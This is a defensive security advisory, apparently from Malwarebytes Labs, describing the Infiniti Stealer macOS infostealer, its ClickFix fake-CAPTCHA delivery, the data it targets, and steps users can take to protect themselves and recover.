Infiniti Stealer - New macOS Infostealer Emerges
Basically, a new malware tricks Mac users into running commands that steal their data.
A new macOS malware called Infiniti Stealer tricks users into executing malicious commands. This poses serious risks to sensitive data on Macs. Stay safe by avoiding suspicious commands.
What Happened
A new macOS infostealer has emerged, initially tracked as NukeChain but now identified as Infiniti Stealer. This malware targets sensitive data from Mac systems using a technique called ClickFix. Instead of exploiting software vulnerabilities, it deceives users into executing malicious commands themselves. The malware's delivery method involves a fake CAPTCHA page that mimics a legitimate verification process. This approach is particularly dangerous because it bypasses traditional security measures.
The malware is written in Python and compiled using Nuitka, which converts Python code into a native macOS binary. This compilation method increases the difficulty of detection and analysis, making it a unique threat in the macOS landscape. As the first documented campaign to use ClickFix with a Nuitka-compiled Python stealer, Infiniti Stealer represents a significant evolution in malware tactics targeting Mac users.
Who's Being Targeted
Infiniti Stealer primarily targets macOS users who may believe their systems are less vulnerable to malware. This perception is changing as more sophisticated attacks emerge. The malware spreads via a deceptive page hosted on update-check[.]com, which tricks users into running a command in their Terminal. By convincing users to execute commands directly, the malware effectively circumvents many conventional defenses.
The technique of social engineering used here is reminiscent of methods previously seen on Windows systems. However, the adaptation for macOS indicates that attackers are broadening their scope, recognizing the growing user base of Apple devices. The potential for widespread impact is significant, as many users may not be aware of the risks associated with running commands from untrusted sources.
Signs of Infection
Once executed, the malware initiates a multi-stage infection process. The first stage involves a Bash dropper that decodes and executes a second-stage binary, which is a Nuitka-compiled executable. This binary is designed to gather a wide range of sensitive information, including:
- Credentials from browsers like Chrome and Firefox
- macOS Keychain entries
- Cryptocurrency wallet information
- Plaintext secrets from developer files
- Screenshots captured during execution
The malware also incorporates checks to avoid detection by running in known analysis environments, further complicating efforts to identify and mitigate its effects. Users may not notice anything unusual until sensitive information has already been exfiltrated.
How to Protect Yourself
If you suspect that your Mac may have been compromised by Infiniti Stealer, immediate action is crucial. Here are some recommended steps:
- Stop using the device for sensitive activities like banking or accessing work accounts.
- Change your passwords on a clean device, starting with critical accounts such as email and banking.
- Revoke access to active sessions and API tokens.
- Check for suspicious files in directories like /tmp and ~/Library/LaunchAgents.
- Run a full malware scan using a reputable tool like Malwarebytes to detect and remove any malicious software.
It's essential to remember that no legitimate CAPTCHA will ever require you to paste commands into your Terminal. Stay vigilant and avoid executing any commands from untrusted websites to protect your data.
Malwarebytes Labs